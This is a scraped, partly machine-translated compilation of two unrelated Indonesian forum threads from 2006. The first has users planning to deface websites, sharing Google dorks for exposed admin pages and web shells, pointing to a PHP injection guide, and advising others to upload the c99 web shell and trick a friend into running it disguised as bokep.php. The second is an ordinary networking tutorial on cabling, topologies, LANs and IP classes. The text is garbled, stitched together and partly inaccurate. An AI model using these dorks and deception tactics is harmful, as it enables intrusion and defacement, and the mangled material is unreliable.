Klo Ada Yg PHP No /? Klo Ada, Deface That Aza / heh
-------------------------------------------------- ------------------------------
alcapone05-11-2006, 06:03 PM
elo girls deface tawarin Bokep / swt / swt / swt / swt
-------------------------------------------------- ------------------------------
D-Cracker05-11-2006, 06:52 pm
Yes, Boy From His mind Dech Tree / swt BKN B'Gitu Mksd Gw / Gw Mksd omg, Mustinya We
Nge Hacking, Cracking, Defacing Web Porno, aim Let Yg Lord of Web Porn That kesel / heh I'll
Not Want Lage Doi Bikin Web Porno, Now pornographic Web Khan World Jd Reduced / Great
Khan's no1 / heh
-------------------------------------------------- ------------------------------
meyerzz05-11-2006, 10:51 PM
yes ..
gw also want he asked ..
nyarinya gimana tuh?
-------------------------------------------------- ------------------------------
alcapone05-11-2006, 11:01 PM
Web kalo Bokep in the world diminished, many would reply sadly / gg / gg / gg
@ D-Cracker
PM gue bales woy zzzzzzzzz
-------------------------------------------------- ------------------------------
meyerzz05-11-2006, 11:25 PM
not a web itunya / omg ...
which it .. google
wah ..
dangers of the world euy /!
-------------------------------------------------- ------------------------------
itlust05-11-2006, 11:36 AM
google hacking klo usually okay allinurl: admin / login.php
-------------------------------------------------- ------------------------------
meyerzz06-11-2006, 02:18 pm
hmm ..
but can klo nyari dikasi / shell.php?
-------------------------------------------------- ------------------------------
itlust06-11-2006, 03:55 PM
allinurl: / shell.php
-------------------------------------------------- ------------------------------
meyerzz06-11-2006, 04:14 PM
first test .. klo will be GRP ..
-------------------------------------------------- ------------------------------
D-Cracker06-11-2006, 07:30 PM
@ D-Cracker
PM gue bales woy zzzzzzzzz
Kpn Lu AM /? Klo PM Gw's New Yg, must Lg Aza His POP UP /? PM's Lu Not There Dech
/ shell.php?
According Gw, Klo His Word Search Kek Gini hard Msh 8X
allinurl: / shell.php
No Nge Help / sob
-------------------------------------------------- ------------------------------
itlust06-11-2006, 07:51 pm
@ top
He dies a nemuin nanya gimana cara yg / shell.php ...
web search for bsa guns in deface what it should own coba2 dunk XD
google hack google instead of just kyk dorkling? (ato Dorking huh?) =))
-------------------------------------------------- ------------------------------
alcapone06-11-2006, 07:55 PM
@ the passer-mudeng hackers
ksh tau caranya can deface the website, aka cartoon hentai bokep wrote in a foreign country /? / gg /
gg / gg
-------------------------------------------------- ------------------------------
D-Cracker06-11-2006, 07:56 PM
google hack google instead of just kyk dorkling? (ato Dorking ya?)
Yes, Gw Tau Is Not His opponent Google Hack /! What name is forgotten Lage Gw, Serious /!
Yg Clearly Google Hack Any Make, It's Teasing Yg point "Mao Nge Hack, Mao Nge Hack?" Tp
Make Bhs.Inggris
Password Cthnya Gw Nyari Make A Web GHack, So Pas gw Click "Google It blah ...."
-------------------------------------------------- ------------------------------
D-Cracker06-11-2006, 07:58 pm
@ the passer-mudeng hackers
ksh tau caranya can deface the website, aka cartoon hentai bokep yg abroad
Gw No Mudeng Hacker, Cm His Tau Basic doank / heh B'Coz Udh Kt Org Yg Sene At Chase Dr.
"Deface It Cm edit the index.html or index.php Gotta We Doing Proud, It Sich Starter Jg Bs"
-------------------------------------------------- ------------------------------
alcapone06-11-2006, 07:59 PM
PHP / E14, ajarin dunk / gg / gg
the HTTP reply, how his way deface nge / ...
-------------------------------------------------- ------------------------------
D-Cracker06-11-2006, 08:02 pm
the HTTP reply <- HTTP, wakakakakk ..... : laughing: Wakakakk ..... Mao Ngelawak Mass. / heh
Klo The **** Read This, Can Salto Kale 780 Degrees / swt
-------------------------------------------------- ------------------------------
alcapone06-11-2006, 08:08 PM
ohh no, so the HTTP nda isa to, just know I / gg / gg / gg
loe mean **** right Th0r / E14
-------------------------------------------------- ------------------------------
D-Cracker06-11-2006, 08:17 PM
ohh no, so the HTTP nda isa to, just know I
Wkakakak .... / heh Gw Jd Keseleg Nich / Hr Each sob Period Open Internet, Tp No Tau HTTP
That Is /?
-------------------------------------------------- ------------------------------
itlust06-11-2006, 09:06 PM
Yes, Gw Tau Is Not His opponent Google Hack /! What name is forgotten Lage Gw, Serious /!
Yg Clearly Google Hack Any Make, It's Teasing Yg point "Mao Nge Hack, Mao Nge Hack?" Tp
Make Bhs.Inggris
Password Cthnya Gw Nyari Make A Web GHack, So Pas gw Click "Google It blah ...."
Kagak Tau, Gw Dizziness Nich / heh How Fast Considered Inappropriate <- Tanya knp /? Keep
Nyari, Ampe Mampus
Setau g google hack google ma kyk dorkling same ... Setau g masi blon google there are other de: D
o iya klo jng png double post reply disatuin aj 2 org dlm 1 post:)
-------------------------------------------------- ------------------------------
xaxer07-11-2006, 12:47 AM
kalo emang have knowledge bagi2 dunk ..... jgn disimpen sendiri2: D
= HTTP protocol for the internet, kalo gak salah acronym Hyper Text Transfer Protocol, so that the
protocol for file transfer, kira2 so, mudah2an gak salah, kalo salah tolong dimaapin n corrected: D
kalo mau pake nyari on google allinurl still think d, g kemaren2 still want to try nampil kok
-------------------------------------------------- ------------------------------
D-Cracker08-11-2006, 05:39 PM
Yes, Lovable Can /! hold such a link would need behind Web / shell.php khan /? Emang Sich Can,
Tp Not Easy At All Inject / sob
-------------------------------------------------- ------------------------------
meyerzz08-11-2006, 05:47 PM
yes /!
ga bisa / sob
ga jadi deh grpnya / heh
-------------------------------------------------- ------------------------------
D-Cracker08-11-2006, 05:50 pm
Bknnya No Can, Can Can Sich / heh Yes We Go Web Links One example: www.xxx.com /
shell.php <--- Shell.php this, perhaps the contents page, klo gw sich nemuin pages about oysters /
heh aka Qta nge dolo must inject mass, lu upload dolo code / scriptnya at geocities / where the
hand-over loe, abis ever lived ikutin yg wa langkah2x Kase / no1
-------------------------------------------------- ------------------------------
meyerzz08-11-2006, 05:55 PM
Where langkah2nya mas /?
the thread where?
-------------------------------------------------- ------------------------------
D-Cracker08-11-2006, 06:03 PM
The Security Thread N Hacking, "Little About PHP Injection" Tp There bbrp Error Writing / SHG
heh what Nulis Pengen Gw yg gw mskd, MLH MJD smilies / heh
Or How Short: PHP Injection (http://codeattack.wordpress.com/2006/07/20/tips-php-injection/)
-------------------------------------------------- ------------------------------
Gloria08-11-2006, 06:54 PM
Um ... Om Mao nanya / heh Klo We Scriptnya Tau Dah, Khan Hrs To Go On the Upload Web
Hosting Gratisan / heh Wa's Nich Web Hosting Accounts At Gratisan geocities / cute_verial / no1
Abis That Aplod Scriptnya How /?
-------------------------------------------------- ------------------------------
kodoks08-11-2006, 07:07 pm
Easy, Try Loe Download c99sh Upload Go Webserver (must support PHP 4 + +).
How? easy aja ... temen aja loe boongin (temen dolo aje ...) rename aja kalo asked bokep.php hell?
told you it could ngambil image of Se-WebsiteWebsite Bokep indo ... but temen loe must not
understand PHP ... kalo gak bakal understand ketp ma!
-------------------------------------------------- ------------------------------
D-Cracker10-11-2006, 05:05 PM
Upload Scriptnya Jgn At Geocities / heh The aza 1111mb.com support php version 4 / no1
-------------------------------------------------- ------------------------------
Hack WLAN
Makace!
simple banget kok, .. but should pake Orinoco card Web Gambar Maps Buku Terjemahan Blog
Gmail selengkapnya ▼Direktori
Kalender
Foto
Documents
Site
Grup
Bantuan
Penerjemahan
Penelusuran Diterjemahkan
Translator Toolkit
sebenarnya gak tau mulai dari mana nih ngomongnya, tapi karena thread ini dimulail dengan kabel,
kita bahs dikit tentang kabel ya..maap kalo membosankan bagi yang udah tau, kan lumayan, bagi-
bagi ilmu bagi yang belum tau
kabel
=====
bicara tentang jaringan, pasti gak lepas dari yang namanya kabel, walaupun sekarang udah
jamannya wireless, tapi kabel tetap akan menjadi bahan pelajaran yang gak mungkin dilupakan oleh
network equipment, toh wireless sekarang juga masih menganut ajaran (emang silat?) wired,
misalnya optik dll lah
prinsip kerjanya sih ringan, kabel ngubungin satu sisi dengan sisi yang lain dengan terminator di
masing2 ujung, tapi hubungan ini tidak menyebabkan hubungan tertutup antar 2 sisi saja, bisa di
setting menjadi 2 hubungan terbuka dengan sisi yang lain
sekarang kan jaman udah canggih, jadi topologi kabel juga berkembang, mulai dari jamannya
teknologi telegraf yang make gelombang radio hingga jamannya serat optik dan laser.
kabel:Type CAT 1
tipe :UTP
fitur:analog(biasanya digunakan di perangkat telephone pada umumnya dan pada jalur ISDN –
integrated service digital networks-. Juga untuk menghubungkan modem dengan line telepon).
kabel:Type CAT 2
tipe :UTP
fitur:up to 1 Mbits(sering digunakan pada topologi token ring)
kabel:Type CAT 3
tipe :UTP / STP
fitur:16 Mbits data transfer(sering digunakan pada topologi token ring atau
10BaseT)
kabel:Type CAT 4
tipe :UTP, STP
fitur:20 Mbits data transfer(biasanya digunakan pada topologi token ring)
kabel:Type CAT 5
tipe :UTP, STP
fitur:up to 100 MH. 100 Mbits data transfer / 22 db
kabel:Type CAT 5enhanced
tipe :UTP, STP
fitur:up to 100 MHz.1 Gigabit Ethernet up to 100 meters - 4 copper
pairs(kedua jenis CAT5 sering digunakan pada topologi token ring 16Mbps, Ethernet 10Mbps atau
pada FastEthernet 100Mbps)
kabel:Type CAT 6
tipe :UTP, STP
fitur:up to 155 MHz or 250 MHz. 2,5 Gigabit Ethernet up to 100 meters or 10
Gbit/s up to 25 meters . 20,2 db (Gigabit Ethernet)
kabel:Type CAT 7
tipe :UTP, STP
fitur:up to 200 MHz or 700 Mhz Giga-Ethernet / 20.8 db(Gigabit Ethernet)
ini tipe kabel, bukan untuk dihafal lho...alis juga ngambilnya dari:
http://www.glossary-tech.com/cable.htm dan http://www.firewall.cx/cabling_utp.php
Pemberian kategori 1/2/3/4/5/6 merupakan kategori spesifikasi untuk masing-masing kabel tembaga
dan juga untuk jack. Masing-masing merupakan seri revisi atas kualitas kabel, kualitas
pembungkusan kabel (isolator) dan juga untuk kualitas “belitan” (twist) masing-masing pasang
kabel. Selain itu juga untuk menentukan besaran frekuensi yang bisa lewat pada sarana kabel
tersebut, dan juga kualitas isolator sehingga bisa mengurangi efek induksi antar kabel (noise bisa
ditekan sedemikian rupa).------> fisika banget tuh
Perlu diingat juga (ingak..ingak), spesifikasi antara CAT5 dan CAT5 enchanced mempunyai standar
industri yang sama, namun pada CAT5e sudah dilengkapi dengan insulator untuk mengurangi efek
induksi atau electromagnetic interference. Kabel CAT5e bisa digunakan untuk menghubungkan
network hingga
kecepatan 1Gbps.(buset..1 giga bokkkkkk)
Kabel Coaxial ini (RG-6) jika digunakan dalam jaringan mempunyai spesifikasi dan aturan sebagai
berikut:
* Setiap ujung harus diterminasi dengan terminator 50-ohm (dianjurkan menggunakan terminator
yang sudah dirakit, bukan menggunakan satu buah resistor 50-ohm 1 watt, sebab resistor
mempunyai disipasi tegangan yang lumayan lebar, kalo gak ahli, bisa gawat nih).
* Maksimum 3 segment dengan peralatan terhubung (attached devices) atau berupa populated
segments.
* Setiap kartu jaringan mempunyai pemancar tambahan (external transceiver).
* Setiap segment maksimum berisi 100 perangkat jaringan, termasuk dalam hal ini repeaters.
* Maksimum panjang kabel per segment adalah 1.640 feet (atau sekitar 500 meter).
* Maksimum jarak antar segment adalah 4.920 feet (atau sekitar 1500 meter).
* Setiap segment harus diberi ground.
* Jarang maksimum antara tap atau pencabang dari kabel utama ke perangkat (device) adalah 16
feet(sekitar 5 meter).
* Jaral minimum antar tap adalah 8 feet (sekitar 2,5 meter).
ini tipe kabel, bukan untuk dihafal lho...alis juga ngambilnya dari:
http://www.glossary-tech.com/cable.htm dan http://www.firewall.cx/cabling_utp.php
dengan modal les bahasa inggris, hhe..
ntar kita akan ngebahas topologi jaringan yang merupakan "program kerja" dari kabel itu sendiri
semoga bermanfaat
__________________
Kuasai Dunia dengan Informasi
My Blog
My Friendster
My Facebook
jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh
12-12-2006, 01:31 PM #3
jurnalis jh
Imum Mukim
Join Date: Nov 2006
Location: d/h AlisBandung
Posts: 2,246
Thanks: 3
Thanked 18 Times in 9 Posts
--------------------------------------------------------------------------------
topologi jaringan
=================
penentuan topologi jaringan akan menentukan jenis kabel yang akan kita pake, dan juga sebaliknya,
ketersediaan kabel dan gocek yangkita punya, menjadi pikiran dong untuk membangun sebuah
jaringan (untuk kedepannya kita sebut network, biar keren)
sebenarnya sih banyak banget topologi network itu, tapi yang sering kita dengar itu cuma 3 doang,
dan yang banyak itu juga berbasis yang 3 ini, cuma kadang2 pelaku network memodifikasi sedikit
tergantung kondisi, misalkan areanya, panjang kabelnya, dll
1. ring topology
Topologi ini manfaatin kurva tertutup, artinya informasi dan data serta traffic disalurkan sedemikian
rupa sehingga ke masing-masing node. Umumnya fasilitas ini memanfaatkan fiber optic sebagai
sarananya
(walaupun ada juga yang menggunakan twisted pair).
(bahasannya ada di atas)
3. star topology
Topologi jaringan ini banyak digunakan di berbagai tempat, karena kemudahan untuk menambah,
mengurangi atau mendeteksi kerusakan jaringan yang ada. Selain itu, permasalahan panjang kabel
yang harus sesuai (matching) juga tidak menjadi suatu yang penting lagi. Pokoknya asal ada hub
(yang masih beres tentunya) maka bisa terhubunglah beberapa komputer dan sumber daya jaringan
secara mudah.
Dengan berbekal crimtool, kabel UTP (biasanya CAT5) dan connector, seseorang dengan mudah
membuat sebuah sistem jaringan. Tentu ada beberapa kerugian karena panjang kabel (loss effect)
maupun karena hukum konduksi, namun hampir bisa dikatakan semua itu bisa diabaikan.
Paparan ketiga topologi di atas hanya sebagai sebuah pengantar. Intinya bahwa sebuah jaringan bisa
jadi
merupakan kombinasi dari dua atau tiga topologi di atas. Misalnya saja ada yang menyebut tree
topology,
dimana sebenarnya topologi ini merupakan gabungan atau kombinasi dari ketiga topologi yang ada.
itu sekilas tentang topologi jaringan, sebenarnya lebih enak kalo ada gambarnya, tapi alis masih
bingung, gimana ya cara upload gambar di postingan?
__________________
Kuasai Dunia dengan Informasi
My Blog
My Friendster
My Facebook
jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh
12-12-2006, 01:41 PM #4
ihan_sunrise
Contributor
--------------------------------------------------------------------------------
up load gambar harus dari photobucket dulu lis.....setelah itu baru masukin kemari...kayaknya dulu
dah ad penjelasannya, cuman ihan lupa di thread apa
__________________
cinta telah merengkuh ku
dan aku lega bisa memeluknya
rindu telah menarik ku
dan aku senang karena ia tak membiar kan ku
Ihan Sunrise
http://ihansunrise.blogspot.com/
ihan_sunrise
View Public Profile
Send a private message to ihan_sunrise
Visit ihan_sunrise's homepage!
Find More Posts by ihan_sunrise
12-12-2006, 05:09 PM #5
baiquni
Peutua
--------------------------------------------------------------------------------
makasih ya alis... ilmu yang alis share semoga bermanfaat bagi kita semua amien.
Alis... gi ngapain ?
__________________
Satu hati... Satu rasa... SEMESTINYA !!!
My Blogs: http://www.baiquni.net/
My Wordpress: http://baiquni.wordpress.com/
My Friendster: http://www.friendster.com/mbaiquni
My Bussiness: http://www.ipulsa.net/
baiquni
View Public Profile
Send a private message to baiquni
Visit baiquni's homepage!
Find More Posts by baiquni
12-15-2006, 12:58 PM #6
jurnalis jh
Imum Mukim
Join Date: Nov 2006
Location: d/h AlisBandung
Posts: 2,246
Thanks: 3
Thanked 18 Times in 9 Posts
--------------------------------------------------------------------------------
Quote:
Originally Posted by baiquni
makasih ya alis... ilmu yang alis share semoga bermanfaat bagi kita semua amien.
Alis... gi ngapain ?
My Blog
My Friendster
My Facebook
jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh
12-15-2006, 01:32 PM #7
sHinOsuke
Super Moderator
--------------------------------------------------------------------------------
sHinOsuke
View Public Profile
Send a private message to sHinOsuke
Find More Posts by sHinOsuke
12-15-2006, 03:33 PM #8
aloysurf
TUKANG FOTO
--------------------------------------------------------------------------------
Quote:
Originally Posted by AlisBandung
itu sekilas tentang topologi jaringan, sebenarnya lebih enak kalo ada gambarnya, tapi alis masih
bingung, gimana ya cara upload gambar di postingan?
Salam
aloysurf
View Public Profile
Send a private message to aloysurf
Visit aloysurf's homepage!
Find More Posts by aloysurf
12-17-2006, 11:22 AM #9
muiz
Peutua
--------------------------------------------------------------------------------
Quote:
Originally Posted by AlisBandung
amin...alis kira gak ada yang respon, hhe..
ntar kita mulai lagi dengan LAN...tapi sekarang lagi searching bahan2 TA dulu, besok ya di
sambung lagi
ow..mantap bang lagi sibuk TA malah sempat bagi2 ilmu mantap..oya untuk cara pasang kabel utp
nya ditambah dikit donk bang,,,biar mantap...sekalian cara buat pc router...dalam bahasa indonesia
ya bang...sep...mantap buat bang alis..
muiz
View Public Profile
Send a private message to muiz
Find More Posts by muiz
--------------------------------------------------------------------------------
acheh
View Public Profile
Send a private message to acheh
Find More Posts by acheh
--------------------------------------------------------------------------------
@acheh
ternyata repot ya buat nambahin gambar ke sini, jadi males juga euy..hhe
@muiz
pc router dan masang UTP ya...
besok kita sambung ya...
@Shinosuke
sip deh, tapi sebelum WLAN, kita bahas LANnya aja dulu ya..
sambung nyak....
kemarin kita udah ngebahas kabel ama topologinya, sekarang kita bakal bahas salah satu
implementasinya, yaitu LAN
seiring berkembangnya jaman ni, kita gak hanya mengenal LAN doang, tapi sekarang udah ada
WLAN, yaitu Wireless LAN, yaitu LAN tanpa kabel (simplenya gitu).
Local Area Network (LAN) adalah sejumlah komputer yang saling dihubungkan bersama di dalam
satu areal tertentu yang tidak begitu luas, seperti di dalam satu kantor atau gedung.
Secara komunikasinya, terdapat dua tipe jaringan atau LAN, yaitu jaringan Peer to Peer dan
jaringan Client-Server.
Pada jaringan peer to peer, setiap komputer yang terhubung ke jaringan dapat bertindak baik
sebagai workstation maupun server. Sedangkan pada jaringan Client-Server, hanya satu komputer
yang bertugas sebagai server dan komputer lain berperan sebagai workstation. Antara dua tipe
jaringan
tersebut masing-masing memiliki keunggulan dan kelemahan, ntar kita bakal bahas lebuh jauh
PC
walah, gak banget deh bahas masalah PC yang kita pake sekarang ini, tapi kita akan bahas PC yang
berfungsi di jaringan aja.
Tipe personal komputer yang digunakan di dalam jaringan akan sangat menentukan unjuk kerja dari
jaringan tersebut. Komputer dengan unjuk kerja tinggi akan mampu mengirim dan mengakses data
dalam jaringan dengan cepat.
Di dalam jaringan tipe Client-Server, komputer yang difungsikan sebagai server mutlak harus
memiliki unjuk kerja yang lebih tinggi dibandingkan komputer-komputer
lain sebagai workstation-nya, karena server akan bertugas menyediakan fasilitas dan
mengelola operasional jaringan tersebut
NIC
Berdasarkan tipe bus, ada beberapa tipe network interface card (nic) atau network card, yaitu ISA
dan PCI.
Saat ini terdapat jenis network card yang banyak digunakan, yaitu PCI
untuk lebih jelasnya, lihat aja LAN Card sodara-sodara..asal gak on board kayak punya alis, hhe..
NAD
bukan naggroe kita nih, tapi Network Adapter Card. Setiap network card akan memiliki driver atau
program yang berfungsi untuk mengaktifkan dan mengkonfigurasi network adapter tersebut
disesuaikan dengan lingkungan dimana network card tersebut dipasang agar dapat digunakan untuk
melakukan komunikasi data.
sistem operasi
OS disini bukan seperti Windows dan Linux, tapi OS peer to peer dan Client Server. kita bahas
satu2...
1. Jaringan Client-Server
-------------------------
Server adalah komputer yang menyediakan fasilitas bagi komputer-komputer lain didalam jaringan
dan client adalah komputer-komputer yang menerima atau menggunakan fasilitas yang disediakan
oleh server. Server dijaringan tipe client-server disebut dengan Dedicated Server karena murni
berperan sebagai server yang menyediakan fasilitas kepada workstation dan server tersebut tidak
dapat berperan sebagai workstation.
Keunggulan
1. Kecepatan akses lebih tinggi karena penyediaan fasilitas jaringan dan pengelolaannya dilakukan
secara khusus oleh satu komputer (server) yang tidak dibebani dengan tugas lain sebagai
workstation.
2. Sistem keamanan dan administrasi jaringan lebih baik, karena terdapat seorang pemakai yang
bertugas sebagai administrator jaringan, yang mengelola administrasi dan sistem keamanan
jaringan.
3. Sistem backup data lebih baik, karena pada jaringan client-server backup dilakukan terpusat di
server, yang akan membackup seluruh data yang digunakan di dalam jaringan.
Kelemahan
1. Biaya operasional relatif lebih mahal.
2. Diperlukan adanya satu komputer khusus yang berkemampuan lebih untuk ditugaskan
sebagai server.
3. Kelangsungan jaringan sangat tergantung pada server. Bila server mengalami gangguan maka
secara keseluruhan jaringan akan terganggu.
Keunggulan
1. Antar komputer dalam jaringan dapat saling berbagi-pakai fasilitas yang dimilikinya
seperti:harddisk, drive, fax/modem, printer.
2. Biaya operasional relatif lebih murah dibandingkan dengan tipe jaringan client-server, salah
satunya karena tidak memerlukan adanya server yang memiliki kemampuan khusus untuk
mengorganisasikan dan menyediakan fasilitas jaringan.
3. Kelangsungan kerja jaringan tidak tergantung pada satu server. Sehingga bila salah satu
komputer/peer mati atau rusak, jaringan secara keseluruhan tidak akan mengalami gangguan.
Kelemahan
1. Troubleshooting jaringan relatif lebih sulit, karena pada jaringan tipe peer to peer setiap
komputer dimungkinkan untuk terlibat dalam komunikasi yang ada. Di jaringan client-server,
komunikasi adalah antara server dengan workstation.
2. Unjuk kerja lebih rendah dibandingkan dengan jaringan client-server, karena setiap
komputer/peer disamping harus mengelola pemakaian fasilitas jaringan juga harus mengelola
pekerjaan atau aplikasi sendiri.
3. Sistem keamanan jaringan ditentukan oleh masing-masing user dengan mengatur keamanan
masing-masing fasilitas yang dimiliki.
4. Karena data jaringan tersebar di masing-masing komputer dalam jaringan, maka backup harus
dilakukan oleh masing-masing komputer tersebut.
nah, itu sekilas tentang LAN, karena udah kebanyakan, biar gak bosen, kita udahin dulu, ntar kita
bahas tentang protokol2nya dan hardware lain yang mendukung LAN itu serta request dari teman2..
("_")
__________________
Kuasai Dunia dengan Informasi
My Blog
My Friendster
My Facebook
jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh
--------------------------------------------------------------------------------
Quote:
Originally Posted by acheh
ini thread makin sip klo disertai dengan gambarnya ..
misal kabel coaxial, nah gambar coaxialnya gmn .. gtu ...
muiz
View Public Profile
Send a private message to muiz
Find More Posts by muiz
--------------------------------------------------------------------------------
muiz
View Public Profile
Send a private message to muiz
Find More Posts by muiz
--------------------------------------------------------------------------------
---------------------
jadi gini, kabel UTP (ada 8 kabel warna-warni) itu kan punya standard, agar di setiap negara yang
memakainya pnya keseragaman dalam implementasinya, nah sampai saat alis mengenal UTP, ada 2
standar yag dipakai, yaitu:
1. Standard T568-A
Pin warna
--------------------
1 putih dan hijo
2 hijo
3 putih orange
4 Biru
5 putih dan biru
6 Orange
7 putih dan coklat
8 coklat
2. Standard T568-B
Pin warna
--------------------
1 putih dan orange
2 Orange
3 putih dan hijo
4 Biru
5 putih dan biru
hurried step towards the table bedroom living room
6 hijo
2 standard itu ntar terpakai pada saat kabel digunakan untuk straight, rollover atau crossover, gini
penjelasannya:
Straight-Through
=================
Jenis kabel ini digunakan untuk menghubungkan antara workstation dengan hub/switch. Kabel ini
juga memiliki 4 pairs (8 wire) dimana setiap pin antara ujung satu dengan ujung lainnya harus
sama. Maksudnya, bila salah satu ujung memakai standard T568-A maka ujung satunya harus
memakai T568-A juga. Begitu pula sebaliknya, jika salah satu ujung menggunakan standard T568-
B, ujung satunya juga harus memakai standard yang sama.
Rollover
========
Digunakan untuk koneksi antara sebuah workstation ke port console pada sebuah router atau switch.
Standard yang digunakan adalah T568-A pada salah satu ujung dan
ujung lainnya urutan T568-A tinggal di roll (dibalik). Demikian juga jika yang dipakai adalah
standard T568-B.
Crossover
===========
Merupakan jenis kabel yang digunakan untuk menghubungkan antar workstation atau antar
hub/switch. Kabel jenis ini menggunakan standard T568-A pada salah satu ujung, dan T568-B pada
ujung lainnya.
1. Pembuatan kabel
a) Siapkan kabel UTP dan RJ 45 sebagai interfacenya
b) Potong jaket ujung kabel kira-kira 1.5 cm dengan cutter atau gunting,dan buanglah jaket tersebut.
Hati-hati dalam mengupas jaket, jangan sampai kabel yang ada di dalamnya ikut terpotong.
c) Untwist atau buka lilitan masing-masing pasangan kabel
d) Untuk membuat kabel straight-trough, crossover maupun rollover, lihat standard T568-A atau
T568-B
e) Sesuaikan masing-masing jenis kabel dengan standardnya, lalu luruskan hingga memungkinkan
untuk bisa dimasukkan ke dalam RJ 45
f) Bila sudah dimasukkan ke RJ 45, crimpinglah dengan menggunakan peralatan yang ada agar
kabel menjadi permanen dan tidak mudah goyah
g) Periksa terlebih dahulu urutan kabelnya sebelum dicrimping, karena kabel yang sudah
dicrimping tidak dapat dicabut lagi. Artinya jika kita salah mengurutkan pasangan atau
memasukkan ke RJ 45 nya kurang sempurna, besar kemungkinan kabel tidak dapat dipakai
2. Test kabel
a) Kabel yang sudah dicrimping dapat dideteksi kesalahannya dengan memakai cable tester (misal :
Fluke 620 LSN CableMeter)
b) Bila cable tester tidak ada, pasangkan kabel tersebut dari NIC ke hub (bila jenisnya straight-
through) dan antar workstation jika jenis kabelnya adalah crossover.
c) Pekailah perintah ping untuk uji coba kabel. Apabila koneksi dapat terbentuk, berarti pembuatan
kabel Anda sudah benar. Sebaliknya, jika koneksi tak dapat terbentuk, berarti ada kesalahan dalam
proses cabling.
semoga bermanfaat
__________________
Kuasai Dunia dengan Informasi
My Blog
My Friendster
My Facebook
jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh
Protokol TCP/IP
===============
Karena penting peranannya pada sistem operasi Windows dan juga karena protokol TCP/IP
merupakan protokol pilihan (default) dari Windows. Protokol TCP berada pada lapisan Transport
model OSI (Open System Interconnection), sedangkan IP berada pada lapisan Network mode OSI
IP Address
----------
IP address adalah alamat yang diberikan pada jaringan komputer dan peralatan jaringan yang
menggunakan protokol TCP/IP. IP address terdiri atas 32 bit angka biner yang dapat dituliskan
sebagai empat kelompok angka desimal yang dipisahkan oleh tanda titik seperti 192.168.0.1.
+-------------------+-----------+
| Network ID | Host ID |
+-----+------+------+-----------+
| 192 | 168 | 0 | 1 |
+-----+------+------+-----------+
IP address terdiri atas dua bagian yaitu network ID dan host ID, dimana network ID menentukan
alamat jaringan komputer, sedangkan host ID menentukan alamat host (komputer, router, switch).
Oleh sebab itu IP address memberikan alamat lengkap suatu host beserta alamat jaringan di mana
host itu berada.
Kelas-kelas IP Address
------------------------
Untuk mempermudah pemakaian, bergantung pada kebutuhan pemakai, IP address dibagi dalam
tiga kelas seperti diperlihatkan dibawah
------+------------+---------------+--------------------+
Kelas |Network ID Host ID | Default Subnet Mask|
------+-------------+---------------+--------------------+
A |xxx.0.0.1 |xxx.255.255.254| 255.0.0.0 |
B |xxx.xxx.0.1 |xxx.xxx.255.254| 255.255.0.0 |
C |xxx.xxx.xxx.1|xxx.xxx.xxx.254| 255.255.255.0 |
------+-------------+---------------+--------------------+
IP address kelas A diberikan untuk jaringan dengan jumlah host yang sangat besar.
Range IP 1.xxx.xxx.xxx. – 126.xxx.xxx.xxx, terdapat 16.777.214 (16 juta) IP address pada tiap
kelas A.
IP address kelas A diberikan untuk jaringan dengan jumlah host yang sangat besar. Pada IP address
kelas A, network ID ialah 8 bit pertama, sedangkan host ID ialah 24 bit berikutnya.
Dengan demikian, cara membaca IP address kelas A, misalnya 113.46.5.6 ialah:
Network ID = 113
Host ID = 46.5.6
Sehingga IP address diatas berarti host nomor 46.5.6 pada network nomor 113.
IP address kelas B biasanya dialokasikan untuk jaringan berukuran sedang dan besar. Pada IP
address kelas B, network ID ialah 16 bit pertama, sedangkan host ID ialah 16 bit berikutnya.
Dengan demikian, cara membaca IP address kelas B, misalnya 132.92.121.1
Network ID = 132.92
Host ID = 121.1
Sehingga IP address di atas berarti host nomor 121.1 pada network nomor 132.92. dengan panjang
host ID 16 bit, network dengan IP address kelas B dapat menampung sekitar 65000 host. Range IP
128.0.xxx.xxx – 191.155.xxx.xxx
IP address kelas C awalnya digunakan untuk jaringan berukuran kecil (LAN). Host ID ialah 8 bit
terakhir. Dengan konfigurasi ini, bisa dibentuk sekitar 2 juta network dengan masing-masing
network memiliki 256 IP address. Range IP 192.0.0.xxx – 223.255.255.x.
Pengalokasian IP address pada dasarnya ialah proses memilih network Id dan host ID yang tepat
untuk suatu jaringan. Tepat atau tidaknya konfigurasi ini tergantung dari tujuan yang hendak
dicapai, yaitu mengalokasikan IP address seefisien mungkin.
1. Root-level domain: merupakan tingkat teratas yang ditampilkan sebagai tanda titik (.).
2. Top level domain: kode kategori organisasi atau negara misalnya: .com untuk dipakai oleh
perusahaan; .edu untuk dipakai oleh perguruan tinggi; .gov untuk dipakai oleh badan pemerintahan.
Selain itu untuk membedakan pemakaian nama oleh suatu negara dengan
negara lain digunakan tanda misalnya .id untuk Indonesia atau .au untuk australia.
3. Second level domain: merupakan nama untuk organisasi atau perusahaan, misalnya:
microsoft.com; yahoo.com, dan lain-lain.
Topologi Jaringan adalah gambaran secara fisik dari pola hubungan antara komponen-komponen
jaringan, yang meliputi server, workstation, hub dan pengkabelannnya. Terdapat tiga macam
topologi jaringan umum digunakan, yaitu Bus, Star dan Ring.
__________________
Kuasai Dunia dengan Informasi
My Blog
My Friendster
My Facebook
jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh
--------------------------------------------------------------------------------
My Blog
My Friendster
My Facebook
jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh
--------------------------------------------------------------------------------
Quote:
Originally Posted by AlisBandung
@acheh
ternyata repot ya buat nambahin gambar ke sini, jadi males juga euy..hhe
@muiz
pc router dan masang UTP ya...
besok kita sambung ya...
@Shinosuke
sip deh, tapi sebelum WLAN, kita bahas LANnya aja dulu ya..
sambung nyak....
kemarin kita udah ngebahas kabel ama topologinya, sekarang kita bakal bahas salah satu
implementasinya, yaitu LAN
seiring berkembangnya jaman ni, kita gak hanya mengenal LAN doang, tapi sekarang udah ada
WLAN, yaitu Wireless LAN, yaitu LAN tanpa kabel (simplenya gitu).
Local Area Network (LAN) adalah sejumlah komputer yang saling dihubungkan bersama di dalam
satu areal tertentu yang tidak begitu luas, seperti di dalam satu kantor atau gedung.
